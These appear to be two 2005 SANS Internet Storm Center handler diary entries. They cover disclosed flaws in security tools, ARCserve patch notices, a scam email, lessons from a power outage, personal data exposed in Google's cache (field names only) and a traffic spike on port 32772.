Overall Risk: High

Impact: Critical

Popularity: Medium

Simplicity: Medium

Regular Diary

Kismet / Metasploit

We received some questions about the vulnerabilities on Kismet, disclosed at DefCon. The Kismet Wireless website, includes the following message:

"Mon Aug 01 2005 - Fixes to the announced vulnerabilities in Kismet are in progress (pending info) tonight, stay tuned for a big announcement when the vulns are fixed.

References: http://www.kismetwireless.net/

There was also some discussion about the suppose vulnerability on Metasploit framework disclosed at DefCon. It was assigned the Bugtraq ID of 14431.

"Metasploit Framework is prone to an unspecified vulnerability. This issue allows remote attackers to compromise the computer of users using the affected application."

References: http://www.securityfocus.com/bid/14431/info

UPDATE: from Security Focus website:

This BID has been retired as it been determined that the issue is not a vulnerability. Additional information has been provided that states the issue is a due to insufficient filtering of potentially malicious terminal escape sequences when logging external input. These escape sequences are not interpreted at any point by the application, and only pose a threat if rendered with an external viewer within a terminal emulator program that will interpret them. In that instance, this presents a security vulnerability in the terminal emulator program. As Metasploit does not interpret the malicious input itself, it is not within the scope of the application to filter this type of input. This is not a vulnerability in Metasploit since it does not impact security properties of the application itself.

at: http://www.securityfocus.com/bid/14431/discuss

Same kind of information was issued for the CANVAS suite.
With a Bugtraq ID of 14446

"Immunity CANVAS is prone to an unspecified vulnerability. This issue allows remote attackers to compromise the computer of users running the affected application."

References: http://www.securityfocus.com/bid/14446/info

Brian Krebs wrote about these in his blog as well, after attending the Shmoo Group track at Defcon. Good reading.

References: http://blogs.washingtonpost.com/securityfix/2005/07/patching_your_e.html

There was also some discussion about it at the Daily Dave Mailling List, if you want to follow.

References: https://www.immunitysec.com/pipermail/dailydave/2005-August/002266.html

There are not much info about these yet, but we recommend you to be careful when using these tools, doing your 'tests'...:)

New Buffer overflows ARCserve

New Buffer overflows on BrightStor ARCserve Backup and BrightStor Enterprise Backup application agent code used on Windows platforms.

The security update can be downloaded from:

BrightStor ARCserve Backup r11.1 for Windows:

BrightStor ARCserve Backup r11.0 for Windows:

BrightStor ARCserve Backup v9.01 for Windows:

BrightStor Enterprise Backup v10.5 for Windows:

BrightStor Enterprise Backup v10.0 for Windows:

New Nigerian Scam

We got a example of another Nigerian Scam. This time they are trying to help us!:)

"Presently we discovered that some certain miscreants pose as
Bank/government officials to defraud innocent people off their hard
earn money."

"Help fight crime to make this earth a better place to live in."

Oh, came on...Does any one believe on this kind of scam yet?:)
(ok...I know the answer...)

Google update

About Lorna's yesterday diary, we received some requests to include the url which the data was stored. We are not announcing the site in question as we are attempting to protect the private information.

PwStealers project

Ok, this is a request for PwStealers samples for an article that I am writing...so, if you get some, could you please .zip with infected password and subject pwstealer ?:) .

Power Outage Fun

One of the ISC handlers had the fun of dealing with a pretty major power
outage this afternoon. The building that he works in has office areas, the
primary IT data center for his campus, as well as the regional law
enforcement dispatch. Most of the office areas have deskside UPS units to
help protect the more expensive workstations (such as sun workstations) or
the more critical computers that are located in the office. As this
building was outfitted in recent years with a natural gas based generator,
and has a large scale UPS for the data center, there should not have been
much more then a blip on the radar screen today. Right? Wrong.

The data center UPS has functioned quite well throughout, with the only
reason to shutdown servers was to limit the amount of heat being
generated. The deskside UPS units were sized in such a way that those
important office systems could handle any fluxuations caused by the power
outage itself, as well as any problems with the generator adjusting as it
phases in and out of the utility power.

Though the generator does undergo routine tests, the generator failed to
bring the building power back in a timely matter. Apparently, the
building load was high enough (due to summer heat and the large number of
new servers being brought online in the new fiscal year) that it would
automatically trip itself with an overload condition each time it tried to
take over. The facilities management personnel eventually used the various
building breakers to turn off the AC for the datacenter (which is not on
the UPS), lights, and a few other of the large breakers. Then they were
able to force the generator to take the building load, and slowly flip
back on some of the building level breakers. That allowed the generator
to slowly take over the load in a way it could handle. I am almost
certain that there will be discussions with the manufacturer and the
facilities management about how to avoid this issue again and wether there
is anything that can test for this type of event.

The other notable event comes from the systems administrators of the large
installation servers in the data center. Recently, most of them have
received the nice new deskside UPS units to help protect their
workstations in the office. Half of them had dutifully installed these new
UPS units, while others had not taken the time to do so, or were just
waiting for the next power outage to force them to take down their
workstation so they could re-cable things in their office. Unfortunately,
some of the ones who had installed their UPS did so incorrectly. One
particular one had went as far to plug his windows computer and monitor
into the battery backed-up plugs and accidentally had the LCD panel and Sun
workstation plugged in on the surge suppressed side. Another installed
things correctly, but had installed the vendor supplied software on his
windows computer (with the LCD) but hadn't configured it. A third had
intended to use one of the systems in the data center to secure shell into
his workstation and shut it down gracefully, but failed to ever have the
host-based firewall rules (or was it tcp wrappers) configured to allow
connections originating from the datacenter back into the workstation.

Thankfully, no perceived damage has occurred to any of the workstations,
and the outage last maybe 30 minutes prior to the generator finally taking
on the full load. (They were still on generator power at last check and
there may be further problems as the generator phases back out to utility

In all of this, the ISC handler noted that many unexpected difficulties
were just that....unexpected. The company he works for had had actually
planned for power outages (especially weather related ones), so their
standard operating procedure had come into play for the data center. The
sysadmins had however not planned as thoroughly on their office
workstations. Things like having monitors (or printers) plugged into the
battery port, or having the more critical workstation plugged into the
surge suppressed port can be seen as simple oversights. The individual
who had not configured the security in such a way as to allow remote
administration from the data center, probably had the right idea, but had
failed to test it (until today). And the one individual who had his
windows computer using vendor supported software configured to shutdown
within 5 minutes of a power outage also had the right idea, but failed to
think through the process of "Oh, I need the windows computer and LCD up
long enough that I can shutdown down the unix system. Don't need to let
the automatic software to kick in a predetermined time, just need to start
auto shutdown procedure if after work hours, or the battery is reporting 5
minutes left to go.".

To you our readers, this is an excellent time to consider a few questions
concerning your standard operating procedures. Here are a few questions
asked by the ISC handler who experienced this today.

* If this event had been weather related, or had occured at a time when
only the operations staff were in the office, would the on-hand staff know
what to do, who to call?

* If you have deskside units, have you configured the automatic shutdown
software properly?

* And for part of the security piece of this, have you configured the
firewall rules, tcpwrappers, etc etc, in such a way that you can
gracefully shutdown from a remote location (home or other designated

* Do you know for fact that the network will be up if you needed to
shutdown across the network (including that little 4 or 8 port switch in
your office)?

* Have you actually planned what to do in the event of an emergency or

* Are your generators physically secured and checked routinely in the case
of vandalism or other similar problems?

If you haven't planned for the unexpected, it will eventually get you.


Handler on Duty: Pedro Bueno - pbueno %% isc. sans. org


Published: 2005-08-01

Cash from the Cache; Port 32772

Cash from the Cache

You never can tell where you will find things and today was no exception. We received a report from Colin Keith about some interesting information that was found in Google's cache. It seems an order for Internet services triggered a little looksy by the sales department. Due to the dollar amount of the request, they checked the account name being given with a highly sophisticated tool. Yes, a google query soon brought up the individual's name as well a bit more than they bargain for. It seems ALL of this individual's personal information was found on the web in Google's cache to include the following information of which no data was missing from ANY of these fields:

First name:

Last name:







Mother's Maiden Name:

Driver Licence:

Issued State:


Card Type:

Card name:

Card number:

Expiry Date:


ATM Pin:

Bank Name:

Bank Phone:

Routing Number:

Account Number:

Paypal Email:

Paypal Password:

It really only gets worse. This was not the only person who had their account information here. Granted the Google cache dated from 2004, but that doesn't really matter when you have this kind of information laying around. Obviously someone was attempting to use it. Other things included in the cached info for some folks included purchase information such as the product and quantity purchased, how the product was to be shipped, where it was to be shipped, cost, subtotal, tax, shipping and even special instructions such as notes to be attached to the item if it was a gift.

I don't want to even attempt to guess where this information was illegally obtained from considering the different types of information involved, the location of the website and the location of the requestor. Yes, we have reported it. What I do want to focus on is the fact that MANY people's personal as well as financial data was sitting out on the Internet for anyone to access if they just looked. Given the fact that the information has been sitting out there now for over seven months, only further drives home the point of how critical it is to do Google searches on yourself. Keep in mind that this too has its dangers. Though some may disagree with me, I wouldn't be entering my credit card information and searching on it. Also, please do this from a patched machine, firewall turned on, antivirus updated and using a safe web browser. However, it is important to put your name, as well as your family members' names, in Google and/or other search engines, and see what turns up. Use different combinations of your name as they might have used in the past, and consider looking for old email addresses that may have been used as well. When you get the results, don't just go to the web site, but also click on the link for the cached information and see what used to be there. None of the data above was found on the current website, just in the cached information. None of the information would naturally be found on this type of site. So, before anyone attempts to get cash from the cache using your name, beat them too it by making sure no information about you is out there that should not be.

For any of you who work with/for the different search engines or have first hand knowledge about how to get cached information removed, we would appreciate you dropping us a line with some details.

Port 32772

Okay, curiosity will be my down fall yet. This port has had a significant jump in it for the last couple of days. The targets are few, but the source and the record numbers have really spiked. Anybody seeing any traffic on this or have any ideas? Please pass them our way if you don't mind. Packets are always nice and welcome as well:>)

Lorna Hutcheson

Handler on Duty